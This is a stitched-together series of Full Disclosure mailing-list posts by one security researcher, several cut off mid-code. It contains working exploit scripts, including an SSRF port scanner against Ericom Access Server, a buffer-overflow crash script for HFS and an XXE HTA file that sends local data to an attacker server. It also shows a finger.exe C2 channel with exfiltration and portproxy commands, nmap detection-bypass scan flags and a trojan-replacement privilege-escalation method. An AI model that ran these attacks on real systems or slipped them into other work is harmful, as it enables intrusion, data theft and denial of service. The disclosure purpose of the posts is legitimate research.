#PCAP saving -s flag, default size limit is also 1MB. # #RESTORE CONSOLE -r focus the console window (Win OS) if console is minimized on port scan detect. # #Private Network range: #Wrote this for basic LAN visibility for my attacker machine, packets from public IP ranges are ignored. # #BYPASS examples --scanflags and custom packet window sizes: #Recon-Informer does not try to detect every case of --scanflags or specially crafted packets. # #These scans can bypass Recon-Informer and correctly report open ports found. #nmap -n -Pn -sS --scanflags PSHSYN x.x.x.x -p139 #nmap -P0 -T4 -sS --scanflags=SYNPSH x.x.x.x # #Therefore, I accounted for some of these in Recon-Informer to report these detections. # #SCANFLAGS #nmap -P0 -T4 -sS --scanflags=SYNURG x.x.x.x -p139 (returns correct) #nmap -P0 -T4 -sS --scanflags=PSHSYNURG x.x.x.x -p21-445 (returns correct) #nmap -P0 -T4 -sS --scanflags=ECE x.x.x.x shows up as NULL scan (nothin useful returned) #nmap -n -Pn -sS --scanflags 0x42 x.x.x.x -p139 (useful) #nmap -n -Pn -sS --scanflags=SYNPSH x.x.x.x -p135 (useful) # #The above scanflag examples, would have bypassed detec
[FD] NtFileSins v2.2 / Windows NTFS Privileged File Access Enumeration Tool (Python v3)
from subprocess import Popen, PIPE import sys,argparse,re #MIT License #Copyright (c) 2020 John Page (aka hyp3rlinx) #Permission is hereby granted, free of charge, to any person obtaining a copy #of this software and associated documentation files (the "Software"), to deal #in the Software without restriction, including without limitation the rights #to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the Software is #furnished to do so, subject to the following conditions: #The above copyright notice and this permission notice shall be included in all #copies or substantial portions of the Software. #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #SOFTWARE. #Permission is also explicitly given for insertion in vulnerability databases and similar, #provided that due credit is given to the author John Page (aka hyp3rlinx). # # # NtFileSins v2.2 (c) # By John Page (aka hyp3rlinx) # Python v3 compatible # Enhancements: search target user dir on first pass, unless the -d flag is used, added .dat, .tmp file ext checks. # TODO: Alternate Data Streams (ADS) check e.g. abc.txt:test.txt:$DATA # Original advisory: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NTFS-PRIVILEGED-FILE-ACCESS-ENUMERATION.txt # # NtFileSins is a Windows File Enumeration Intel Gathering Tool. # Standard users can prove existence of privileged user artifacts. # # Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message, # when a file exists or doesn't exist, when restricted access is attempted by another user. # # However, accessing files directly by attempting to "open" them from cmd.exe shell, # we can determine existence by compare inconsistent Windows error messages. # # Requirements: 1) target users with >= privileges (not admin to admin). # 2) artifacts must contain a dot "." or returns false positives. # # Windows message "Access Denied" = Exists # Windows message "The system cannot find the file" = Not exists # Windows returns "no message" OR "c:\victim\artifact is not recognized as an internal or external command, # operable program or batch file" = Admin to Admin so this script is not required. # # Profile other users by compare ntfs error messages to potentially learn their activities or machines purpose. # For evil or maybe check for basic malware IOC existence on disk with user-only rights. #From a defensive perspective we can leverage this to try to detect basic IOC and malware artifacts like .tmp, .ini, .dll, .exe #or related config files on disk with user-only rights, instead of authenticating with admin rights as a quick paranoid first pass. #Example, if malware hides itself by unlinking themselves from the EPROCESS list in memory or using programs like WinRAP to hide #processess from Windows TaskMgr, we may not discover them even if using tasklist command. The EPROCESS structure and flink/blink is #how Windows TaskMgr shows all running processes. However, we may possibly detect them by testing for the correct IOC name if the #malicious code happens to reside on disk and not only in memory. Whats cool is we can be do this without the need for admin rights. # #Other Windows commands that will also let us confirm file existence by comparing error messages are start, call, copy, icalcs, and cd. #However, Windows commands rename, ren, cacls, type, dir, erase, move or del commands will issue flat out "Access is denied" messages. # #==# # NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.2 (c) # # By John Page (aka hyp3rlinx) # # Apparition Security # #==# BANNER=''' _ ___ ___ _ / | / /_ __/ (_) /__ / ___/(_)___ _ / |/ / / / / /_ / / / _ \\__ \ / / __ \/ ___/ / /| / / / / __/ / / / __/__/ / / / / (__ ) /_/ |_/ /_/ /_/ /_/_/\___//_/_/ /_// v2.2 (c) By hyp3rlinx ApparitionSec ''' sin_cnt=0 internet_sin_cnt=0 found_set=set() zone_set=set() ARTIFACTS_SET=set() ROOTDIR = "c:/Users/" ZONE_IDENTIFIER=":Zone.Identifier:$DATA" USER_DIRS=["
[FD] Recon Informer v1.2 - Intel for offensive systems tool.
import logging,os,ctypes,sys,argparse,time,re from subprocess import * from datetime import datetime from pkgutil import iter_modules import pkg_resources #Recon Informer (c) v1.2 #By John Page (hyp3rlinx) #ApparitionSec #hyp3rlinx.altervista.org #twitter.com/hyp3rlinx #apparition...@gmail.com #PoC Video URL: https://www.youtube.com/watch?v=XM-G9Udbphc #== #v1.2 fixed: window title bug, removed pygetwindow module. # #Recon Informer is a basic real-time anti-reconnaissance (nmap) detection tool for offensive #security systems, useful for penetration testers. It runs on Windows/Linux and leverages scapy. # #Purpose: #Recon-Informer is NOT meant for protecting public facing or lan critical enterprise systems whatsoever. #Its purpose is detect possible recon against our attacker system on a LAN to provide us defensive intel. #Therefore, this script is most useful for basic short-term defensive visibility. # #Features: #Attempt to detect and identify typical port scans generated using Nmap including scan type. #-sS, -sC, -F, -sR, -sT, -sA, -sW, -sN, -sF, -sX, -sM, -sZ, -sY, -sO, -sV, -sP, -sn, -f (fragment scan), -D (Decoy). # #FYI, scans such as FIN don't work well on windows OS and firewalls can make scans return incorrect result. #XMAS scans work against systems following RFC 793 for TCP/IP and don’t work against any Windows versions, #NULL is another type that don't work well on Windows. # #However, Fin, Null and Xmas scans can work on Linux machines. Therefore, Recon-Informer checks the OS #its run on and reports on scans that affect that OS, unless the -s "scan_type" flag is supplied. #With -s flag you can add extra scan types to detect that otherwise would be ignored. # #PING SWEEP (-sP, -sn, -sn -PY, -sY -PY) disabled by default. #Not enabled by default as most Nmap scans begin with an ARP who-has request, when using -p flag you #will see this detection preceding most scans. Also, you may see (noise) non-reconaissance related ARP #requests or even ones resulting from your own ICMP pings, this exclusive detection may fail if a scan uses -Pn flag. # #ICMP #Note: If nmap --disable-arp-ping flag is supplied for the scan it will be detected as ICMP ping. # #BLOCK -b offending IP(s) default is no blocking as packets can be spoofed causing DoS. #Firewall rule for blocks are in-bound "ANY" but still allows out-bound. #FW rules are named like ReconInformer_. # #DELETE FW RULE -d to remove FW rules for blocked hosts. # #WHITELIST -w HOST-IP(s) you never want to block on. # #FILTER DEST PORTS -f (filter_dst_port) cut down noisy ports like TCP 2869, NetBIOs 137 etc. #ignore packets destined for specific ports to try reduce false positive probe alerts. # #IGNORE HOST -n don't process packets from specific hosts, e.g. intranet-apps, printers and ACKS #from SMB connected shares to try reduce false positives. # #LOG -l flag, default size limit for writing to disk is 1MB. # #UDP protocol is ignored by default to try reduce false positives from sources like NetBIOS, SNMP etc. #To detect UDP scans use the -u flag, then can also combine with -f port filter #(reduce noise) on specific dest ports like 137,161,1900,2869,7680. # #PCAP saving -s flag, default size limit is also 1MB. # #RESTORE CONSOLE -r focus the console window (Win OS) if console is minimized on port scan detect. # #Private Network range: #Wrote this for basic LAN visibility for my attacker machine, packets from public IP ranges are ignored. # #BYPASS examples --scanflags and custom packet window sizes: #Recon-Informer does not try to detect every case of --scanflags or specially crafted packets. # #These scans can bypass Recon-Informer and correctly report open ports found. #nmap -n -Pn -sS --scanflags PSHSYN x.x.x.x -p139 #nmap -P0 -T4 -sS --scanflags=SYNPSH x.x.x.x # #Therefore, I accounted for some of these in Recon-Informer to report these detections. # #SCANFLAGS #nmap -P0 -T4 -sS --scanflags=SYNURG x.x.x.x -p139 (returns correct) #nmap -P0 -T4 -sS --scanflags=PSHSYNURG x.x.x.x -p21-445 (returns correct) #nmap -P0 -T4 -sS --scanflags=ECE x.x.x.x shows up as NULL scan (nothin useful returned) #nmap -n -Pn -sS --scanflags 0x42 x.x.x.x -p139 (useful) #nmap -n -Pn -sS --scanflags=SYNPSH x.x.x.x -p135 (useful) # #The above scanflag examples, would have bypassed detection if we didn't check packets for them. #Useful scanflags that return open ports and bypassed Recon-Informer prior to scanflag checks: # #10=(0x00a) SYNPSH #34= (0x22) SYNURG #42=(0x02a) SYNPSHURG #66 (0x42) SYNECN #74 (0x04a) SYNPSHECN #98 (0x062) SYNURGECN #106 (0x06a) SYNPSHURGECN #130 (0x082) SYNCWR #138 (0x08a) SYNPSHCWR #162 (0x0a2) SYNURGCWR #170 (0x0aa) SYNPSHURGCWR #194 (0x0c2) SYNECNCWR #202 (0x0ca) SYNPSHECNCWR #226 (0x0e2) SYNURGECNCWR #234 (0x0ea) SYNPSHURGECNCWR # #Custom packet window size from 1024 typical of Nmap SYN scans to a size of 666 for the bypass!. #ip=IP(dst="1
[FD] Windows TCPIP Finger Command / C2 Channel and Bypassing Security Software
[+] Title: Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec Microsoft Windows TCPIP Finger Command "finger.exe" that ships with the OS, can be used as a file downloader and makeshift C2 channel. Legitimate use of Windows Finger Command is to send Finger Protocol queries to remote Finger daemons to retrieve user information. However, the finger client can also save the remote server response to disk using the command line redirection operator ">". Intruders who compromise a computer may find it is locked down and "unknown" applications may be unable to download programs or tools. By using built-in native Windows programs, its possible they may be whitelisted by installed security programs and allowed to download files. Redteams and such using LOL methods have made use of "Certutil.exe", native Windows program for downloading files. However, Certutil.exe is recently blocked by Windows Defender Antivirus and logged as event "Trojan:Win32/Ceprolad.A" when it encounters http/https://. Therefore, using Windows finger we can bypass current Windows Defender security restrictions to download tools, send commands and exfil data. The Finger protocol as a C2 channel part works by abusing the "user" token of the FINGER Query protocol "user@host". C2 commands masked as finger queries can download files and or exfil data without Windows Defender interference. Download files: C:\> finger @HOST > Malwr.txt Exfil running processes: C:\> for /f "tokens=1" %i in ('tasklist') do finger %i@192.168.1.21 Typically, (Port 79) default port used by FINGER protocol is often blocked by organizations. Privileged users can bypass this using Windows NetSh Portproxy. This can allow us to bypass Firewall restrictions to reach servers using unrestricted ports like 80/443. Portproxy queries are then sent first to the Local Machines ip-address which are then forwarded to the C2 server specified. Port 43 (WHOIS) traffic. netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=79 connectaddress=[C2-Server] connectport=43 netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=43 connectaddress=[LOCAL-IP] connectport=79 To display Portproxy use "C:\>netsh interface portproxy show all". E.g. using Port 79 Ncat64.exe "nc@C2-Server" > tmp.txt E.g. using Portproxy, send the query to local-ip first. Ncat64.exe "nc@Local-IP" > tmp.txt To leverage Windows finger.exe successfully as a file downloader and help evade network security devices, serve Base64 encoded text-files. DarkFinger.py expects to receive the first two characters of the filename for the Finger Protocol Host token part for file downloads. DarkFinger C2 expects exfil data to prefixed with the dot "." character, so any arbitrary inbound querys are not confused for exfil. This can be changed to whatever or even expanded upon to use XOR obfuscation methods etc... as this is just for basic PoC. [Event Logs / Forensics] Certutil.exe file downloads are now blocked and logged by Windows Defender. "Windows Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software. Name: Trojan:Win32/Ceprolad.A ID: 2147726914 Severity: Severe Category: Trojan ... etc" PowerShell, also used as an LOL method to download files usually generates Windows event logs. Finger initiated downloads write to disk and will leave forensic artifacts. Finger TCP/IP traffic going out to Port 80/443 minus the HTTP protocol may stand out as well. However, searching the Windows event logs for finger.exe entries, I found no trace of it generating Windows event logs anywhere. DarkFinger.py C2 is very basic with no security. It's only to demonstrate using Windows Finger Command for as a C2 channel and show the possibilities. Therefore, anyone can request to change the Port DarkFinger C2 listens on and or download files. During my research, I found nothing on the internet publicly using or documenting Windows TCPIP Finger Command for use as C2 channel. Therefore, I release "DarkFinger.py" C2 server and "DarkFinger-Agent.bat" which calls the Windows finger.exe in attacker friendly ways. Tested successfully Windows 10. [DarkFinger-C2.py] import socket,sys,re,time,os,argparse from subprocess import * from subprocess import Popen, PIPE, STDOUT #DarkFinger / Windows Finger TCPIP Command C2 Server (c) #Downloader and Covert Data Tunneler #By John Page (aka hyp3rlinx) #ApparitionSec #twitter.com/hyp3rlinx # #File Downloads must be Base64 encoded text-files.
[FD] CVE-2020-24548 / Ericom Access Server for (AccessNow & Ericom Blaze) v9.2.0 / Server Side Request Forgery
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ERICOM-ACCESS-SERVER-ACCESS-NOW-BLAZE-9.2.0-SERVER-SIDE-REQUEST-FORGERY.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.ericom.com [Product] Ericom Access Server x64 for (AccessNow & Ericom Blaze) v9.2.0 AccessNow is an HTML5 remote desktop gateway that works from any device with an HTML5 compatible browser, including from Chromebooks and locked down devices. Ericom Blaze provides remote desktop connectivity from Mac, Windows and Linux devices to applications on office / home PCs and virtual desktops (VDI). [Vulnerability Type] Server Side Request Forgery [CVE Reference] CVE-2020-24548 [Security Issue] Ericom Access Server allows attackers to initiate SSRF requests making outbound connections to arbitrary hosts and TCP ports. Attackers, who can reach the AccessNow server can target internal systems that are behind firewalls that are typically not accessible. This can also be used to target third-party systems from the AccessNow server itself. The AccessNow server will return an attacker friendly response, exfiltrating which ports are listening for connections. This can bypass Firewall rules and undermine the integrity of other systems and security controls in place. E.g. listen using Netcat, Nc64.exe -llvp 25 A) Ericom Server 192.168.88.152 (defaults port 8080) B) Attacker 192.168.88.162 C) Victim 192.168.1.104 Using Wireshark we can observe A sends a SYN packet to C (port 25) C sends SYN/ACK to A A sends ACK to C. A sends ACK/FIN to C port 25. We will then get an AccessNow server response similar to below. ["C","M",["Cannot connect to '192.168.1.104:25'.",true]] This message indicates we cannot connect and helpfully informs us of closed vs open ports. [Affected Component] Ericom Server port 8080 will forward connections to arbitrary Hosts and or Ports which are sent using Web-Socket requests. Ericom server then replies with a "Cannot connect to" message if a port is in a closed state. [Attack Vectors] Remote attackers can abuse the Ericom Access Server to conduct port scans on arbitrary systems. This is possible due to a server side request forgery vulnerability and using a remote TCP socket program. [Impact Information Disclosure] true [CVE Impact Other] Exfiltration of open ports [Exploit/POC] import sys,ssl import websocket ##pip install websocket-client #Required #By hyp3rlinx #ApparitionSec # #Ericom Access Server v9.2.0 for (AccessNow & Blaze) SSRF # BANNER=""" __ _ | |/ | | |__ _ __ _ __ ___ _ __| | ___ _ __ ___ | __| | '__| '__/ _ \| '__| |/ _ \| '_ ` _ \ | || | | | | (_) | | | |___| (_) | | | | | | |__|_| |_| \___/|_| \_\___/|_| |_| |_| SSRF Exploit """ def ErrorCom(vs,vp,t,p): try: ws = websocket.create_connection("wss://"+vs+":"+vp+"/blaze/"+t+":"+p, sslopt={'cert_reqs': ssl.CERT_NONE}) ws.send("SSRF4U!") result = ws.recv() #print(result) if result.find("Cannot connect to")==-1: print("[+] Port "+p+" is open for business :)") else: print("[!] Port " + p+ " is closed :(") ws.close() except Exception as e: print(str(e)) if __name__=="__main__": if len(sys.argv) != 5: print(BANNER) print("[+] Ericom Access Server v9.2.0 - SSRF Exploit - CVE-2020-24548") print("[+] By Hyp3rlinX / ApparitionSec") print("[!] Usage: ,,,") exit() if len(sys.argv[4]) > 5: print("[!] Port out of range") exit() print(BANNER) ErrorCom(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4]) [PoC Video URL] https://www.youtube.com/watch?v=oDTd-yRxVJ0 [Network Access] Remote [Severity] Medium [Disclosure Timeline] Vendor Notification : June 21, 2020 Received automated reply : June 21, 2020 Request for status : June 30, 2020 Vendor "Forwarded all the detail to our R&D and Management team" : June 30, 2020 Request for status : July 13, 2020 No vendor reponse Informed vendor advisory: August 11, 2020 Request for status : August 20, 2020 No vendor reponse August 22, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except
[FD] Microsoft Windows mshta.exe HTA File / XML External Entity Injection
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-MSHTA-HTA-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor]www.microsoft.com [Product] Windows MSHTA.EXE .HTA File An HTML Application (HTA) is a Microsoft Windows program whose source code consists of HTML, Dynamic HTML, and one or more scripting languages supported by Internet Explorer, such as VBScript or JScript. The HTML is used to generate the user interface, and the scripting language is used for the program logic. An HTA executes without the constraints of the internet browser security model; in fact, it executes as a "fully trusted" application. [Vulnerability Type] XML External Entity Injection [Impact] Information disclosure, Recon [CVE Reference] N/A [Security Issue] Windows mshta.exe allows processing of XML External Entitys, this can result in local data-theft and or program reconnaissance upon opening specially crafted HTA files. From an attacker perspective, since we are not dependent on scripting languages like Javascript, VBScript or WScript.Shell, we may have better chances at subverting endpoint protection systems as we are only using XML markup. HTA exploits found online typically show code execution, with reliance on ActiveX Objects and scripting engines and hence are more easily detected by security products. Many of these exploits also use payload obfuscation techniques for stealth. However, I found nothing publicly documented that leverages XML injection targeting the mshta.exe HTA file-type. Yea I know, no code execution. However, we get stealthy data theft with recon capabilities. Armed with this info, we can more accurately target potential software vulnerabilities at a later date from info gathering a systems program installations. Usually, this type of recon is seen in first-stage malware infections using the Windows CreateToolhelp32Snapshot API. Therefore, since theres no documented HTA exploits using XXE attacks for this file type, I release the advisory. Successfully tested on Windows 10 and Windows Servers 2016, 2019. [Exploit/POC] Multi program recon and check if running in a Virtual Machine all in a single HTA file, change IP accordingly. 1) "Doit.hta" http://127.0.0.1:8000/datatears.dtd";> %dtd;]> &send; http://127.0.0.1:8000/datatears.dtd";> %dtd;]> &send; http://127.0.0.1:8000/datatears.dtd";> %dtd;]> &send; 2) The "datatears.dtd" DTD file hosted on attackers server. http://127.0.0.1:8000?%file;'>"> %all; 3) Local Python v3 web-server listening on port 8000 to receive victims info. python -m http.server [POC Video URL]https://www.youtube.com/watch?v=XaTrBEu4Ghw [Network Access] Remote [Severity] High [Disclosure Timeline] MSHTA .HTA files are classified untrusted, many threats already well known. July 4, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2020-13432 - HFS HTTP File Server / Remote Buffer Overflow DoS
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/HFS-HTTP-FILE-SERVER-v2.3-REMOTE-BUFFER-OVERFLOW-DoS.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.rejetto.com [Product] HFS Http File Server v2.3m Build 300 [Vulnerability Type] Remote Buffer Overflow (DoS) [CVE Reference] CVE-2020-13432 [Security Issue] rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual files or folders are used, allows remote attackers to trigger an invalid-pointer write access violation via concurrent HTTP requests with a long URI or long HTTP headers like Cookie, User-Agent etc. Remote unauthenticated attackers can send concurrent HTTP requests using an incrementing or specific payload range of junk characters for values in the URL parameters or HTTP headers sent to the server. This results in hfs.exe server crash from an invalid pointer write access violation. Requirements: hfs.exe must have at least one saved virtual file or folder present. Test using a remote IP and NOT from the same machine (localhost). Dump... (e4c.3a8): Access violation - code c005 (first/second chance not available) For analysis of this file, run !analyze -v WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds. eax=000a1390 ebx=000a138c ecx=006eb188 edx=001b esi= edi=0002 eip=777ef8b4 esp=000a0e0c ebp=000a12cc iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 ntdll!RtlpResolveAssemblyStorageMapEntry+0x18: 777ef8b4 53 pushebx 0:000> !load winext/msec 0:000> !exploitable WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds. *** WARNING: Unable to verify checksum for hfs.exe Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlpResolveAssemblyStorageMapEntry+0x0018 (Hash=0x7a29717c.0x325e6a71) PROCESS_NAME: hfs.exe FOLLOWUP_IP: hfs+8fad7 0048fad7 8945f0 mov dword ptr [ebp-10h],eax WRITE_ADDRESS: 000a0e08 [References] https://github.com/rejetto/hfs2/releases/tag/v2.4-rc01 [Exploit/POC] from socket import * import time,sys #HFS HTTP File Server v2.3m build 300. #Vendor: www.rejetto.com #Remote Remote Buffer Overflow DoS #Note: hfs.exe must have at least one saved virtual file or folder on the target #test using a remote IP and not from the same machine. #Discovery: hyp3rlinx #hyp3rlinx.altervista.org #ISR: ApparitionSec #= res="" once=0 cnt=0 max_requests=1666 def hfs_dos(): global ip,port,length,res,once,cnt,max_requests cnt+=1 length += 1 payload = "A"*length try: s=socket(AF_INET, SOCK_STREAM) s.settimeout(2) s.connect((ip,port)) ##bof ="HEAD / HTTP/1.1\r\nHost: "+ip+"Cookie: "+payload+"\r\n\r\n" bof ="HEAD /?mode="+payload+" HTTP/1.1\r\nHost: "+ip+"\r\n\r\n" s.send(bof.encode("utf-8")) if once==0: once+=1 res = s.recv(128) if res != "": print("Targets up please wait...") if "HFS 2.3m" not in str(res): print("[!] Non vulnerable HFS version, exiting :(") exit() except Exception as e: if e != None: if str(e).find("timed out")!=-1: if res=="": print("[!] Target is not up or behind a firewall? :(") exit() else: print("[!] Done!") exit() s.close() if cnt == max_requests: return False return True def msg(): print("HFS HTTP File Server v2.3m build 300.") print("Unauthenticated Remote Buffer Overflow (DoS - PoC)") print("Virtual HFS saved file or folder required.") print("Run from a different machine (IP) than the target.") print("By Hyp3rlinx - ApparitionSec\n") if __name__=="__main__": length=3 if len(sys.argv) != 3: msg() print("Usage: , ") exit() ip = sys.argv[1] port = int(sys.argv[2]) msg() while True: if not hfs_dos(): print("[!] Failed, non vuln version or no virtual files exist :(") break [POC Video URL] https://www.youtube.com/watch?v=qQ-EawfXuWY [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: May 18, 2020 Vendor reply: May 18, 2020 Vendor confirm vulnerability: May 19, 2020 Vendor creates fix: May 20, 2020 Vendor released new version 2.4 :
[FD] Avaya IP Office v9.1.8.0 - 11 Insecure Transit Password Disclosure CVE-2020-7030
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AVAYA-IP-OFFICE-INSECURE-TRANSIT-PASSWORD-DISCLOSURE.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor]www.avaya.com [Product] Avaya IP Office v9.1.8.0 - 11 IP Office Platform provides a single, stackable, scalable small business communications system that grows with your business easily and cost-effectively. [Vulnerability Type] Insecure Transit Password Disclosure [CVE Reference] CVE-2020-7030 ASA-2020-077 [Security Issue] A sensitive information disclosure vulnerability exists in the web interface component of IP Office that may potentially allow a local user to gain unauthorized access to the component. The request URL on port 7071 and the web socket component requests on port 7070 used by Atmosphere-Framework within Avaya IP Office, pass Base64 encoded credentials as part of the URL query string. https://:7071/serveredition/autologin?auth=QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y&referrer=https://x.x.x.x:7070&lang=en_US wss://:7070/WebManagement/webmanagement/atmosphere/QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y?X-Atmosphere-tracking-id=0& X-Atmosphere-Framework=2.0.5-javascript&X-Atmosphere-Transport=websocket&X-Cache-Date=0&Content-Type=text/x-gwt-rpc;%20charset=UTF-8&X-atmo-protocol=true Base64 credentials: QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y Value: Administrator:Administrator The Base64 encoded credentials can be easily disclosed if the machine used to logon to the web Manager is accessed by an attacker. The URL plus the credentials can potentially be leaked or stored in some of the following locations. Browser History Browser Cache Browser Developer Tools Cached by web proxy Referer Header Web Logs Shared Systems [Avaya Products affected] Avaya IP Office 9.x, 10.0 through 10.1.0.7, 11.0 through 11.0.4.2 [References]https://downloads.avaya.com/css/P8/documents/101067493 [Network Access] Remote [Severity] Medium [Disclosure Timeline] Vendor Notification: February 19, 2020 Vendor confirms issue: March 4, 2020 Vendor release advisory fix : June 3, 2020 June 4, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] WinGate v9.4.1.5998 Insecure Permissions EoP CVE-2020-13866
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WINGATE-INSECURE-PERMISSIONS-LOCAL-PRIVILEGE-ESCALATION.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor]wingate.com [Product] WinGate v9.4.1.5998 WinGate is a sophisticated integrated Internet gateway and communications server designed to meet the control, security and email needs of today's Internet-connected businesses. [Vulnerability Type] Insecure Permissions EoP [CVE Reference] CVE-2020-13866 [Security Issue] WinGate has insecure permissions for the installation directory, which allows local users ability to gain privileges by replacing an executable file with a Trojan horse. The WinGate directory hands (F) full control to authenticated users, who can then run arbitrary code as SYSTEM after a WinGate restart or system reboot. C:\Program Files\WinGate>cacls WinGate.exe C:\Program Files\WinGate\WinGate.exe NT AUTHORITY\Authenticated Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Users:(ID)R APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R [Affected Component] WinGate Installation Directory [Impact Code execution] true [Impact Denial of Service] true [Impact Escalation of Privileges] true [Impact Information Disclosure] true [Exploit/POC] Logon as standard user replace WinGate.exe with a trojan executable, wait for restart or reboot the system, your code runs as SYSTEM. [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: May 10, 2020 Vendor acknowledgement: May 10, 2020 Vulnerability confirmed: May 18, 2020 Request status: May 22, 2020 No reply Notify vendor request CVE: May 26, 2020 No reply Advised of public disclosure: June 1, 2020 No reply June 4, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] netABuse - Windows Insufficient Authentication Logic Scanner
import os,re,time,signal,sys from subprocess import * from multiprocessing import Process #By John Page (aka hyp3rlinx) #Apparition Security #twitter.com/hyp3rlinx #Advisory: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt #--- #When a remote systems built-in Administrator account is enabled and both the remote and the target system #passwords match (password reuse) theres no prompt for credentials and we get logged in automagically. # #MountPoints2 and Terminal server client hints in the Windows registry can help us. #Typically, MountPoints2 is used by Forensic analysts to help determine where an attacker laterally moved to previously. #REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##" (we want network logons) #MountPoints2 key entries are stored like '##10.2.1.40#c$' #--- BANNER=""" | \ __ ) __ \_ \ __|_ \__ \ | | __| _ \ | | __/ | ___ \ | | | | \__ \ __/ _| _| \___| \__| _/_\ / \__,_| / \___| By Hyp3rlinx ApparitionSec """ DRIVE="X" FINDME="The command completed successfully." REG_MOUNT2='REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##"' REG_RDPUSERS="REG Query \"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\""+" /s" VULN_FOUND=set() DELAY=2 